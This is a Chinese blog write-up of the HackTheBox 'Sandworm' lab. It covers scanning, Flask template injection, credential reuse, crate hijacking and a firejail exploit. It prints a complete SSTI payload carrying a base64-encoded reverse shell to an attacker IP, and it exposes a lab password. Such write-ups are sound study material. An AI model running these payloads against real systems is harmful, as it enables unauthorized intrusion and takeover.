<!DOCTYPE html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="懒"><meta name="theme-color" content="#2d4356"><meta name="baidu-site-verification"><title>HackTheBox Sandworm WriteUP | 忘返</title><link rel="stylesheet" type="text/css" href="/css/style.css"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.png"><link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script><meta name="generator" content="Hexo 6.3.0"></head><link rel="stylesheet" type="text/css" href="/plugins/highlight/atom-one-dark.min.css"><script type="text/javascript" src="/plugins/highlight/highlight.min.js"></script><script>hljs.initHighlightingOnLoad();
</script><script type="text/javascript" src="/js/ready.js" async></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css"><body class="night"><div class="mobile-head" id="mobile-head"><div class="navbar-icon"><span></span><span></span><span></span></div><div class="navbar-title"><a href="/">LITREILY</a></div><div class="navbar-search"><!--= show a circle here--></div></div><div class="h-wrapper" id="menu"><nav class="h-head box"><div class="m-hdimg"><a class="hdimg img" href="/"><img class="nofancybox" src="/img/profile.jpg" width="128" height="128"></a><h1 class="ttl"><a href="/">忘返</a></h1></div><p class="m-desc">正经人谁写日记啊。</p><div class="m-nav"><ul><li><span class="dot">●</span><a href="/archives/">归档</a></li><li><span class="dot">●</span><a href="/tags/">标签</a></li><li><span class="dot">●</span><a href="/about/">关于</a></li><li><span class="dot">●</span><a href="/links/">友链</a></li><li><span class="dot">●</span><a href="/Tips/">Tips</a></li><li class="m-sch"><form class="form" id="j-formsch" method="get"><input class="txt" type="text" id="local-search-input" name="q" value="搜索" onfocus="if(this.value=='搜索'){this.value='';}" onblur="if(this.value==''){this.value='搜索';}"><input type="text" style="display:none;"></form></li></ul><div id="local-search-result"></div></div></nav></div><div id="back2Top"><a class="fa fa-arrow-up" title="Back to top" href="#"></a></div><div class="box" id="container"><div class="l-wrapper"><div class="l-content box"><div class="l-post l-post-art"><article class="p-art"><div class="p-header box"><h1 class="p-title">HackTheBox Sandworm WriteUP</h1><div class="p-info"><span class="p-date"><i class="fa fa-calendar"></i><a href="/2023/10/23/HackTheBox-Sandworm-WriteUP/">2023-10-23</a></span><span class="p-view" id="busuanzi_container_page_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_page_pv"></span></span></div></div><div class="p-content"><h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image.png" alt="Logo"></p>
<h2 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h2><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><p>题目给了IP，先端口扫描：</p>
<pre><code>rustscan -r 1-65535 -b 924 -t 2000 -a 10.10.11.218
</code></pre>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-1.png" alt="rustscan"></p>
<p>Web服务访问一下，直接跳转到了<code>ssa.htb</code>。<br>配置好hosts文件之后上nmap再仔细扫一遍：</p>
<pre><code>echo &quot;10.10.11.218 ssa.htb&quot; &gt;&gt; /etc/hosts
nmap -p 22,80,443 -A -v -Pn --open --script auth,vuln ssa.htb
</code></pre>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-2.png" alt="nmap"></p>
<p>并没有找到更多有价值的信息。</p>
<h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><pre><code class="bash">ffuf -u https://ssa.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -c -v -r
</code></pre>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-3.png" alt="dir1"><br><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-4.png" alt="dir2"></p>
<p>其中<code>contact</code>是一个提交PGP加密信息的界面：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-5.png" alt="contact"></p>
<p><code>guide</code>是一个指导PGP加密的界面，包含加密、解密和验证等功能：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-6.png" alt="guide"></p>
<p>网站底部有<code>Powered by Flask™ </code>字样，看到这个第一反应应该就是用SSTI漏洞来打了。</p>
<h3 id="服务器端模板注入（SSTI）"><a href="#服务器端模板注入（SSTI）" class="headerlink" title="服务器端模板注入（SSTI）"></a>服务器端模板注入（SSTI）</h3><p>和XSS一样，找SSTI的注入点，首先应该找能够把我们输入的信息完整回显的地方。这里我们找到了<code>guide</code>页面的<code>Verify Signature</code>功能，它能返回我们签名pgp时使用的用户名（这里忘记截图了），简单<code>&#123;&#123;9*9&#125;&#125;</code>验证后证实存在SSTI漏洞。</p>
<p>后续反弹Shell利用的Payload如下：</p>
<pre><code>&#123;&#123; self.__init__.__globals__.__builtins__.__import__('os').popen('echo "c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTkvOTExIDA+JjE="|base64 -d|bash').read() &#125;&#125;
</code></pre>
<p>首先我们在在线网站（<a target="_blank" rel="noopener" href="https://pgptool.org/">PGP Tool</a>）生成PGP密钥对，在用户名处键入Payload：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-7.png" alt="generate"></p>
<p>然后生成签名信息：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-8.png" alt="sign"></p>
<p>将公钥和签名信息丢到网站中验证，成功反弹Shell：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-9.png" alt="reverseshell"></p>
<h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h3><p>当前用户目录下是没有user.txt的。我们在翻看了配置文件后，在<code>/home/atlas/.config/httpie/sessions/localhost_5000/admin.json</code>中发现了用户<code>silentobserver</code>的账号密码：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-10.png" alt="admin.json"></p>
<p>此用户能够在<code>login</code>页面直接登录，也能直接ssh登录到目标：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-11.png" alt="login"></p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-12.png" alt="ssh-1"></p>
<p>&lt;!–&gt;quietLiketheWind22&lt;!–&gt;</p>
<p>执行pspy64看一下进程，找到了一个atlas用户权限执行的定时任务：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-13.png" alt="pspy"></p>
<p>简化一下，然后问一下ChatGPT这是什么意思：</p>
<blockquote>
<p>这个命令是一个结合了 <code>echo</code> 和 <code>cargo</code> 的 shell 命令。我们来逐部分解这个命令：</p>
<ol>
<li><p><strong><code>echo &quot;e&quot;</code></strong>: 这是一个 shell 命令，用于输出 “e” 这个字符。</p>
</li>
<li><p><strong><code>|</code></strong>: 这是一个管道符号。在 shell 中，管道用于将前一个命令的输出作为下一个命令的输入。在这个场景下，它将 “e” 这个字符传递给了 <code>cargo run --offline</code> 命令。</p>
</li>
<li><p><strong><code>cargo run --offline</code></strong>: 这是 Cargo 的一个命令。</p>
<ul>
<li><strong><code>cargo run</code></strong>: 这是 Cargo 的一个命令，它编译并运行指定的 Rust 项目。</li>
<li><strong><code>--offline</code></strong>: 这个标志告诉 Cargo 在离线模式下运行，这意味着它不会尝试联网更新 crate 或解决依赖。它会使用本地缓存的依赖版本。</li>
</ul>
</li>
</ol>
<p>综合来看，<code>echo &quot;e&quot;|cargo run --offline</code> 的意思是：输出 “e” 这个字符，并将这个字符作为输入传递给 <code>cargo run --offline</code>。这通常是为了向 Rust 程序提供一些预期的输入，例如当 Rust 程序期望从标准输入中读取数据时。</p>
</blockquote>
<p>我们在先前获得的第一个Shell，用户权限就是<code>atlas</code>，但那实际上大概率只是一个沙箱环境：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-16.png" alt="sandbox"></p>
<p>所以我们也许需要再次获得atlas用户的真实权限。结合cargo的进程，我们修改rust程序的源码，就可以实现反弹Shell。但是很遗憾，我们并没有src目录的写入权限：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-15.png" alt="src"></p>
<p>继续翻目录，我们有<code>/opt/crates/logger/src/lib.rs</code>的写入权限，而<code>tipnet</code>刚好会调用logger的函数：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-17.png" alt="lib.rs"></p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-18.png" alt="logger"></p>
<p>那么，我们修改<code>lib.rs</code>的源码就可以了：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-19.png" alt="reverse-shell"></p>
<p>获得<code>atlas</code>用户的shell之后，可以看到当前用户下正在运行firejail：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-20.png" alt="firejail"></p>
<p>我们最初获得的Shell，应该就是这个沙箱的环境：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-21.png" alt="chatgpt"></p>
<p><code>firejail</code>存在公开的漏洞，我们直接找到exp利用就好：</p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-23.png" alt="root"></p>
<p><img src="/2023/10/23/HackTheBox-Sandworm-WriteUP/image-24.png" alt="Pwn"></p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>除了SSTI之前做过类似的challenge之外，其他几乎所有知识点都要现学。再次意识到，对于安全人员来说，现学现卖真是一样非常重要的能力。</p>
</div><div class="p-copyright"><blockquote><div class="p-copyright-author"><span class="p-copyright-key">本文作者：</span><span class="p-copytight-value"><a href="mailto:litreily@163.com">忘返</a></span></div><div class="p-copyright-link"><span class="p-copyright-key">本文链接：</span><span class="p-copytight-value"><a href="/2023/10/23/HackTheBox-Sandworm-WriteUP/">https://7mitu.github.io/2023/10/23/HackTheBox-Sandworm-WriteUP/</a></span></div><div class="p-copyright-note"><span class="p-copyright-key">版权声明：</span><span class="p-copytight-value">本博客所有文章除特殊声明外，均采用<a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/"> CC BY-NC 4.0 </a>许可协议。转载请注明出处 <a href="https://7mitu.github.io">忘返的博客</a>！</span></div></blockquote></div></article><div class="p-info box"><span class="p-tags"><i class="fa fa-tags"></i><a href="/tags/HackTheBox/">HackTheBox</a><a href="/tags/SSTI/">SSTI</a></span></div><aside id="toc"><div class="toc-title">目录</div><nav><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE"><span class="toc-number">1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98"><span class="toc-number">2.</span> <span class="toc-text">解题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">2.1.</span> <span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="toc-number">2.2.</span> <span class="toc-text">目录扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%EF%BC%88SSTI%EF%BC%89"><span class="toc-number">2.3.</span> <span class="toc-text">服务器端模板注入（SSTI）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">2.4.</span> <span class="toc-text">提权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E8%AE%B0"><span class="toc-number">3.</span> <span class="toc-text">后记</span></a></li></ol></nav></aside></div><section class="p-ext"><div class="l-pager l-pager-dtl box"><a class="prev" href="/2023/10/30/HackTheBox-Manager-WriteUP/">&lt; HackTheBox Manager WriteUP</a><a class="next" href="/2023/09/25/HackTheBox-RenderQuest-WriteUP/">HackTheBox RenderQuest WriteUP &gt;</a></div></section><footer><p>Copyright © 2016 - 2023 <a href="/." rel="nofollow">忘返</a> | <strong><a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/">CC BY-NC 4.0</a></strong><br><span id="busuanzi_container_site_uv"><i class="fa fa-user"></i><span id="busuanzi_value_site_uv"></span></span> <span id="busuanzi_container_site_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_site_pv"></span></span> | Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a>Theme with<a rel="nofollow" target="_blank" href="https://github.com/litreily/snark-hexo"> snark.</a></p></footer></div></div></div><script type="text/javascript" src="/js/search.js"></script><script type="text/javascript" src="/js/top.js"></script><script type="text/javascript" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
    search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.1" async></script></body></html>